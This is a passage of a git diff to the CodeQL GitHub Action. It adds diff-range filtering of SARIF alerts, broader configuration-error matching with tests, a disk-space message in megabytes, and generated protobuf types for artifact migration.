let sarif = await combineSarifFilesUsingCLI(sarifFiles, gitHubVersion, features, logger);
|
||||||
|
sarif = filterAlertsByDiffRange(logger, sarif);
|
||||||
sarif = await fingerprints.addFingerprints(sarif, checkoutPath, logger);
|
sarif = await fingerprints.addFingerprints(sarif, checkoutPath, logger);
|
||||||
const analysisKey = await api.getAnalysisKey();
|
const analysisKey = await api.getAnalysisKey();
|
||||||
const environment = actionsUtil.getRequiredInput("matrix");
|
const environment = actionsUtil.getRequiredInput("matrix");
|
||||||
@@ -433,7 +445,7 @@ async function uploadFiles(sarifPath, checkoutPath, category, features, logger)
|
|||||||
const numResultInSarif = countResultsInSarif(sarifPayload);
|
const numResultInSarif = countResultsInSarif(sarifPayload);
|
||||||
logger.debug(`Number of results in upload: ${numResultInSarif}`);
|
logger.debug(`Number of results in upload: ${numResultInSarif}`);
|
||||||
// Make the upload
|
// Make the upload
|
||||||
const sarifID = await uploadPayload(payload, (0, repository_1.parseRepositoryNwo)(util.getRequiredEnvParam("GITHUB_REPOSITORY")), logger);
|
const sarifID = await uploadPayload(payload, (0, repository_1.getRepositoryNwo)(), logger);
|
||||||
logger.endGroup();
|
logger.endGroup();
|
||||||
return {
|
return {
|
||||||
statusReport: {
|
statusReport: {
|
||||||
@@ -522,9 +534,12 @@ async function waitForProcessing(repositoryNwo, sarifID, logger, options = {
|
|||||||
* Returns whether the provided processing errors are a configuration error.
|
* Returns whether the provided processing errors are a configuration error.
|
||||||
*/
|
*/
|
||||||
function shouldConsiderConfigurationError(processingErrors) {
|
function shouldConsiderConfigurationError(processingErrors) {
|
||||||
|
const expectedConfigErrors = [
|
||||||
|
"CodeQL analyses from advanced configurations cannot be processed when the default setup is enabled",
|
||||||
|
"rejecting delivery as the repository has too many logical alerts",
|
||||||
|
];
|
||||||
return (processingErrors.length === 1 &&
|
return (processingErrors.length === 1 &&
|
||||||
processingErrors[0] ===
|
expectedConfigErrors.some((msg) => processingErrors[0].includes(msg)));
|
||||||
"CodeQL analyses from advanced configurations cannot be processed when the default setup is enabled");
|
|
||||||
}
|
}
|
||||||
/**
|
/**
|
||||||
* Returns whether the provided processing errors are the result of an invalid SARIF upload request.
|
* Returns whether the provided processing errors are the result of an invalid SARIF upload request.
|
||||||
@@ -607,4 +622,43 @@ class InvalidSarifUploadError extends Error {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
exports.InvalidSarifUploadError = InvalidSarifUploadError;
|
exports.InvalidSarifUploadError = InvalidSarifUploadError;
|
||||||
|
function filterAlertsByDiffRange(logger, sarif) {
|
||||||
|
const diffRanges = (0, diff_informed_analysis_utils_1.readDiffRangesJsonFile)(logger);
|
||||||
|
if (!diffRanges?.length) {
|
||||||
|
return sarif;
|
||||||
|
}
|
||||||
|
const checkoutPath = actionsUtil.getRequiredInput("checkout_path");
|
||||||
|
for (const run of sarif.runs) {
|
||||||
|
if (run.results) {
|
||||||
|
run.results = run.results.filter((result) => {
|
||||||
|
const locations = [
|
||||||
|
...(result.locations || []).map((loc) => loc.physicalLocation),
|
||||||
|
...(result.relatedLocations || []).map((loc) => loc.physicalLocation),
|
||||||
|
];
|
||||||
|
return locations.some((physicalLocation) => {
|
||||||
|
const locationUri = physicalLocation?.artifactLocation?.uri;
|
||||||
|
const locationStartLine = physicalLocation?.region?.startLine;
|
||||||
|
if (!locationUri || locationStartLine === undefined) {
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
// CodeQL always uses forward slashes as the path separator, so on Windows we
|
||||||
|
// need to replace any backslashes with forward slashes.
|
||||||
|
const locationPath = path
|
||||||
|
.join(checkoutPath, locationUri)
|
||||||
|
.replaceAll(path.sep, "/");
|
||||||
|
// Alert filtering here replicates the same behavior as the restrictAlertsTo
|
||||||
|
// extensible predicate in CodeQL. See the restrictAlertsTo documentation
|
||||||
|
// https://codeql.github.com/codeql-standard-libraries/csharp/codeql/util/AlertFiltering.qll/predicate.AlertFiltering$restrictAlertsTo.3.html
|
||||||
|
// for more details, such as why the filtering applies only to the first line
|
||||||
|
// of an alert location.
|
||||||
|
return diffRanges.some((range) => range.path === locationPath &&
|
||||||
|
((range.startLine <= locationStartLine &&
|
||||||
|
range.endLine >= locationStartLine) ||
|
||||||
|
(range.startLine === 0 && range.endLine === 0)));
|
||||||
|
});
|
||||||
|
});
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return sarif;
|
||||||
|
}
|
||||||
//# sourceMappingURL=upload-lib.js.map
|
//# sourceMappingURL=upload-lib.js.map
|
||||||
File diff suppressed because one or more lines are too long
35
lib/upload-lib.test.js
generated
35
lib/upload-lib.test.js
generated
@@ -244,6 +244,41 @@ ava_1.default.beforeEach(() => {
|
|||||||
type: util_1.GitHubVariant.DOTCOM,
|
type: util_1.GitHubVariant.DOTCOM,
|
||||||
}));
|
}));
|
||||||
});
|
});
|
||||||
|
(0, ava_1.default)("shouldConsiderConfigurationError correctly detects configuration errors", (t) => {
|
||||||
|
const error1 = [
|
||||||
|
"CodeQL analyses from advanced configurations cannot be processed when the default setup is enabled",
|
||||||
|
];
|
||||||
|
t.true(uploadLib.shouldConsiderConfigurationError(error1));
|
||||||
|
const error2 = [
|
||||||
|
"rejecting delivery as the repository has too many logical alerts",
|
||||||
|
];
|
||||||
|
t.true(uploadLib.shouldConsiderConfigurationError(error2));
|
||||||
|
// We fail cases where we get > 1 error messages back
|
||||||
|
const error3 = [
|
||||||
|
"rejecting delivery as the repository has too many alerts",
|
||||||
|
"extra error message",
|
||||||
|
];
|
||||||
|
t.false(uploadLib.shouldConsiderConfigurationError(error3));
|
||||||
|
});
|
||||||
|
(0, ava_1.default)("shouldConsiderInvalidRequest returns correct recognises processing errors", (t) => {
|
||||||
|
const error1 = [
|
||||||
|
"rejecting SARIF",
|
||||||
|
"an invalid URI was provided as a SARIF location",
|
||||||
|
];
|
||||||
|
t.true(uploadLib.shouldConsiderInvalidRequest(error1));
|
||||||
|
const error2 = [
|
||||||
|
"locationFromSarifResult: expected artifact location",
|
||||||
|
"an invalid URI was provided as a SARIF location",
|
||||||
|
];
|
||||||
|
t.true(uploadLib.shouldConsiderInvalidRequest(error2));
|
||||||
|
// We expect ALL errors to be of processing errors, for the outcome to be classified as
|
||||||
|
// an invalid SARIF upload error.
|
||||||
|
const error3 = [
|
||||||
|
"could not convert rules: invalid security severity value, is not a number",
|
||||||
|
"an unknown error occurred",
|
||||||
|
];
|
||||||
|
t.false(uploadLib.shouldConsiderInvalidRequest(error3));
|
||||||
|
});
|
||||||
function createMockSarif(id, tool) {
|
function createMockSarif(id, tool) {
|
||||||
return {
|
return {
|
||||||
runs: [
|
runs: [
|
||||||
|
|||||||
File diff suppressed because one or more lines are too long
6
lib/upload-sarif-action.js
generated
6
lib/upload-sarif-action.js
generated
@@ -61,7 +61,7 @@ async function run() {
|
|||||||
(0, util_1.checkActionVersion)((0, actions_util_1.getActionVersion)(), gitHubVersion);
|
(0, util_1.checkActionVersion)((0, actions_util_1.getActionVersion)(), gitHubVersion);
|
||||||
// Make inputs accessible in the `post` step.
|
// Make inputs accessible in the `post` step.
|
||||||
actionsUtil.persistInputs();
|
actionsUtil.persistInputs();
|
||||||
const repositoryNwo = (0, repository_1.parseRepositoryNwo)((0, util_1.getRequiredEnvParam)("GITHUB_REPOSITORY"));
|
const repositoryNwo = (0, repository_1.getRepositoryNwo)();
|
||||||
const features = new feature_flags_1.Features(gitHubVersion, repositoryNwo, (0, actions_util_1.getTemporaryDirectory)(), logger);
|
const features = new feature_flags_1.Features(gitHubVersion, repositoryNwo, (0, actions_util_1.getTemporaryDirectory)(), logger);
|
||||||
const startingStatusReportBase = await (0, status_report_1.createStatusReportBase)(status_report_1.ActionName.UploadSarif, "starting", startedAt, undefined, await (0, util_1.checkDiskUsage)(logger), logger);
|
const startingStatusReportBase = await (0, status_report_1.createStatusReportBase)(status_report_1.ActionName.UploadSarif, "starting", startedAt, undefined, await (0, util_1.checkDiskUsage)(logger), logger);
|
||||||
if (startingStatusReportBase !== undefined) {
|
if (startingStatusReportBase !== undefined) {
|
||||||
@@ -75,12 +75,12 @@ async function run() {
|
|||||||
core.debug("In test mode. Waiting for processing is disabled.");
|
core.debug("In test mode. Waiting for processing is disabled.");
|
||||||
}
|
}
|
||||||
else if (actionsUtil.getRequiredInput("wait-for-processing") === "true") {
|
else if (actionsUtil.getRequiredInput("wait-for-processing") === "true") {
|
||||||
await upload_lib.waitForProcessing((0, repository_1.parseRepositoryNwo)((0, util_1.getRequiredEnvParam)("GITHUB_REPOSITORY")), uploadResult.sarifID, logger);
|
await upload_lib.waitForProcessing((0, repository_1.getRepositoryNwo)(), uploadResult.sarifID, logger);
|
||||||
}
|
}
|
||||||
await sendSuccessStatusReport(startedAt, uploadResult.statusReport, logger);
|
await sendSuccessStatusReport(startedAt, uploadResult.statusReport, logger);
|
||||||
}
|
}
|
||||||
catch (unwrappedError) {
|
catch (unwrappedError) {
|
||||||
const error = !(0, status_report_1.isFirstPartyAnalysis)(status_report_1.ActionName.UploadSarif) &&
|
const error = (0, status_report_1.isThirdPartyAnalysis)(status_report_1.ActionName.UploadSarif) &&
|
||||||
unwrappedError instanceof upload_lib.InvalidSarifUploadError
|
unwrappedError instanceof upload_lib.InvalidSarifUploadError
|
||||||
? new util_1.ConfigurationError(unwrappedError.message)
|
? new util_1.ConfigurationError(unwrappedError.message)
|
||||||
: (0, util_1.wrapError)(unwrappedError);
|
: (0, util_1.wrapError)(unwrappedError);
|
||||||
|
|||||||
@@ -1 +1 @@
|
|||||||
{"version":3,"file":"upload-sarif-action.js","sourceRoot":"","sources":["../src/upload-sarif-action.ts"],"names":[],"mappings":"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"}
|
{"version":3,"file":"upload-sarif-action.js","sourceRoot":"","sources":["../src/upload-sarif-action.ts"],"names":[],"mappings":"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"}
|
||||||
3
lib/util.js
generated
3
lib/util.js
generated
@@ -823,10 +823,11 @@ async function checkDiskUsage(logger) {
|
|||||||
return undefined;
|
return undefined;
|
||||||
}
|
}
|
||||||
const diskUsage = await (0, check_disk_space_1.default)(getRequiredEnvParam("GITHUB_WORKSPACE"));
|
const diskUsage = await (0, check_disk_space_1.default)(getRequiredEnvParam("GITHUB_WORKSPACE"));
|
||||||
|
const mbInBytes = 1024 * 1024;
|
||||||
const gbInBytes = 1024 * 1024 * 1024;
|
const gbInBytes = 1024 * 1024 * 1024;
|
||||||
if (diskUsage.free < 2 * gbInBytes) {
|
if (diskUsage.free < 2 * gbInBytes) {
|
||||||
const message = "The Actions runner is running low on disk space " +
|
const message = "The Actions runner is running low on disk space " +
|
||||||
`(${(diskUsage.free / gbInBytes).toPrecision(4)} GB available).`;
|
`(${(diskUsage.free / mbInBytes).toPrecision(4)} MB available).`;
|
||||||
if (process.env[environment_1.EnvVar.HAS_WARNED_ABOUT_DISK_SPACE] !== "true") {
|
if (process.env[environment_1.EnvVar.HAS_WARNED_ABOUT_DISK_SPACE] !== "true") {
|
||||||
logger.warning(message);
|
logger.warning(message);
|
||||||
}
|
}
|
||||||
|
|||||||
File diff suppressed because one or more lines are too long
1
node_modules/.bin/dot-object
generated
vendored
1
node_modules/.bin/dot-object
generated
vendored
@@ -1 +0,0 @@
|
|||||||
../dot-object/bin/dot-object
|
|
||||||
1
node_modules/.bin/protoc-gen-twirp_ts
generated
vendored
1
node_modules/.bin/protoc-gen-twirp_ts
generated
vendored
@@ -1 +0,0 @@
|
|||||||
../twirp-ts/protoc-gen-twirp_ts
|
|
||||||
1
node_modules/.bin/tldts
generated
vendored
Symbolic link
1
node_modules/.bin/tldts
generated
vendored
Symbolic link
@@ -0,0 +1 @@
|
|||||||
|
../tldts/bin/cli.js
|
||||||
2537
node_modules/.package-lock.json
generated
vendored
2537
node_modules/.package-lock.json
generated
vendored
File diff suppressed because it is too large
Load Diff
2
node_modules/@actions/artifact/lib/generated/index.d.ts
generated
vendored
2
node_modules/@actions/artifact/lib/generated/index.d.ts
generated
vendored
@@ -1,4 +1,4 @@
|
|||||||
export * from './google/protobuf/timestamp';
|
export * from './google/protobuf/timestamp';
|
||||||
export * from './google/protobuf/wrappers';
|
export * from './google/protobuf/wrappers';
|
||||||
export * from './results/api/v1/artifact';
|
export * from './results/api/v1/artifact';
|
||||||
export * from './results/api/v1/artifact.twirp';
|
export * from './results/api/v1/artifact.twirp-client';
|
||||||
|
|||||||
2
node_modules/@actions/artifact/lib/generated/index.js
generated
vendored
2
node_modules/@actions/artifact/lib/generated/index.js
generated
vendored
@@ -17,5 +17,5 @@ Object.defineProperty(exports, "__esModule", { value: true });
|
|||||||
__exportStar(require("./google/protobuf/timestamp"), exports);
|
__exportStar(require("./google/protobuf/timestamp"), exports);
|
||||||
__exportStar(require("./google/protobuf/wrappers"), exports);
|
__exportStar(require("./google/protobuf/wrappers"), exports);
|
||||||
__exportStar(require("./results/api/v1/artifact"), exports);
|
__exportStar(require("./results/api/v1/artifact"), exports);
|
||||||
__exportStar(require("./results/api/v1/artifact.twirp"), exports);
|
__exportStar(require("./results/api/v1/artifact.twirp-client"), exports);
|
||||||
//# sourceMappingURL=index.js.map
|
//# sourceMappingURL=index.js.map
|
||||||
2
node_modules/@actions/artifact/lib/generated/index.js.map
generated
vendored
2
node_modules/@actions/artifact/lib/generated/index.js.map
generated
vendored
@@ -1 +1 @@
|
|||||||
{"version":3,"file":"index.js","sourceRoot":"","sources":["../../src/generated/index.ts"],"names":[],"mappings":";;;;;;;;;;;;;;;;AAAA,8DAA2C;AAC3C,6DAA0C;AAC1C,4DAAyC;AACzC,kEAA+C"}
|
{"version":3,"file":"index.js","sourceRoot":"","sources":["../../src/generated/index.ts"],"names":[],"mappings":";;;;;;;;;;;;;;;;AAAA,8DAA2C;AAC3C,6DAA0C;AAC1C,4DAAyC;AACzC,yEAAsD"}
|
||||||
106
node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.d.ts
generated
vendored
106
node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.d.ts
generated
vendored
@@ -8,6 +8,66 @@ import { MessageType } from "@protobuf-ts/runtime";
|
|||||||
import { Int64Value } from "../../../google/protobuf/wrappers";
|
import { Int64Value } from "../../../google/protobuf/wrappers";
|
||||||
import { StringValue } from "../../../google/protobuf/wrappers";
|
import { StringValue } from "../../../google/protobuf/wrappers";
|
||||||
import { Timestamp } from "../../../google/protobuf/timestamp";
|
import { Timestamp } from "../../../google/protobuf/timestamp";
|
||||||
|
/**
|
||||||
|
* @generated from protobuf message github.actions.results.api.v1.MigrateArtifactRequest
|
||||||
|
*/
|
||||||
|
export interface MigrateArtifactRequest {
|
||||||
|
/**
|
||||||
|
* @generated from protobuf field: string workflow_run_backend_id = 1;
|
||||||
|
*/
|
||||||
|
workflowRunBackendId: string;
|
||||||
|
/**
|
||||||
|
* @generated from protobuf field: string name = 2;
|
||||||
|
*/
|
||||||
|
name: string;
|
||||||
|
/**
|
||||||
|
* @generated from protobuf field: google.protobuf.Timestamp expires_at = 3;
|
||||||
|
*/
|
||||||
|
expiresAt?: Timestamp;
|
||||||
|
}
|
||||||
|
/**
|
||||||
|
* @generated from protobuf message github.actions.results.api.v1.MigrateArtifactResponse
|
||||||
|
*/
|
||||||
|
export interface MigrateArtifactResponse {
|
||||||
|
/**
|
||||||
|
* @generated from protobuf field: bool ok = 1;
|
||||||
|
*/
|
||||||
|
ok: boolean;
|
||||||
|
/**
|
||||||
|
* @generated from protobuf field: string signed_upload_url = 2;
|
||||||
|
*/
|
||||||
|
signedUploadUrl: string;
|
||||||
|
}
|
||||||
|
/**
|
||||||
|
* @generated from protobuf message github.actions.results.api.v1.FinalizeMigratedArtifactRequest
|
||||||
|
*/
|
||||||
|
export interface FinalizeMigratedArtifactRequest {
|
||||||
|
/**
|
||||||
|
* @generated from protobuf field: string workflow_run_backend_id = 1;
|
||||||
|
*/
|
||||||
|
workflowRunBackendId: string;
|
||||||
|
/**
|
||||||
|
* @generated from protobuf field: string name = 2;
|
||||||
|
*/
|
||||||
|
name: string;
|
||||||
|
/**
|
||||||
|
* @generated from protobuf field: int64 size = 3;
|
||||||
|
*/
|
||||||
|
size: string;
|
||||||
|
}
|
||||||
|
/**
|
||||||
|
* @generated from protobuf message github.actions.results.api.v1.FinalizeMigratedArtifactResponse
|
||||||
|
*/
|
||||||
|
export interface FinalizeMigratedArtifactResponse {
|
||||||
|
/**
|
||||||
|
* @generated from protobuf field: bool ok = 1;
|
||||||
|
*/
|
||||||
|
ok: boolean;
|
||||||
|
/**
|
||||||
|
* @generated from protobuf field: int64 artifact_id = 2;
|
||||||
|
*/
|
||||||
|
artifactId: string;
|
||||||
|
}
|
||||||
/**
|
/**
|
||||||
* @generated from protobuf message github.actions.results.api.v1.CreateArtifactRequest
|
* @generated from protobuf message github.actions.results.api.v1.CreateArtifactRequest
|
||||||
*/
|
*/
|
||||||
@@ -162,6 +222,12 @@ export interface ListArtifactsResponse_MonolithArtifact {
|
|||||||
* @generated from protobuf field: google.protobuf.Timestamp created_at = 6;
|
* @generated from protobuf field: google.protobuf.Timestamp created_at = 6;
|
||||||
*/
|
*/
|
||||||
createdAt?: Timestamp;
|
createdAt?: Timestamp;
|
||||||
|
/**
|
||||||
|
* The SHA-256 digest of the artifact, calculated on upload for upload-artifact v4 & newer
|
||||||
|
*
|
||||||
|
* @generated from protobuf field: google.protobuf.StringValue digest = 7;
|
||||||
|
*/
|
||||||
|
digest?: StringValue;
|
||||||
}
|
}
|
||||||
/**
|
/**
|
||||||
* @generated from protobuf message github.actions.results.api.v1.GetSignedArtifactURLRequest
|
* @generated from protobuf message github.actions.results.api.v1.GetSignedArtifactURLRequest
|
||||||
@@ -219,6 +285,46 @@ export interface DeleteArtifactResponse {
|
|||||||
*/
|
*/
|
||||||
artifactId: string;
|
artifactId: string;
|
||||||
}
|
}
|
||||||
|
declare class MigrateArtifactRequest$Type extends MessageType<MigrateArtifactRequest> {
|
||||||
|
constructor();
|
||||||
|
create(value?: PartialMessage<MigrateArtifactRequest>): MigrateArtifactRequest;
|
||||||
|
internalBinaryRead(reader: IBinaryReader, length: number, options: BinaryReadOptions, target?: MigrateArtifactRequest): MigrateArtifactRequest;
|
||||||
|
internalBinaryWrite(message: MigrateArtifactRequest, writer: IBinaryWriter, options: BinaryWriteOptions): IBinaryWriter;
|
||||||
|
}
|
||||||
|
/**
|
||||||
|
* @generated MessageType for protobuf message github.actions.results.api.v1.MigrateArtifactRequest
|
||||||
|
*/
|
||||||
|
export declare const MigrateArtifactRequest: MigrateArtifactRequest$Type;
|
||||||
|
declare class MigrateArtifactResponse$Type extends MessageType<MigrateArtifactResponse> {
|
||||||
|
constructor();
|
||||||
|
create(value?: PartialMessage<MigrateArtifactResponse>): MigrateArtifactResponse;
|
||||||
|
internalBinaryRead(reader: IBinaryReader, length: number, options: BinaryReadOptions, target?: MigrateArtifactResponse): MigrateArtifactResponse;
|
||||||
|
internalBinaryWrite(message: MigrateArtifactResponse, writer: IBinaryWriter, options: BinaryWriteOptions): IBinaryWriter;
|
||||||
|
}
|
||||||
|
/**
|
||||||
|
* @generated MessageType for protobuf message github.actions.results.api.v1.MigrateArtifactResponse
|
||||||
|
*/
|
||||||
|
export declare const MigrateArtifactResponse: MigrateArtifactResponse$Type;
|
||||||
|
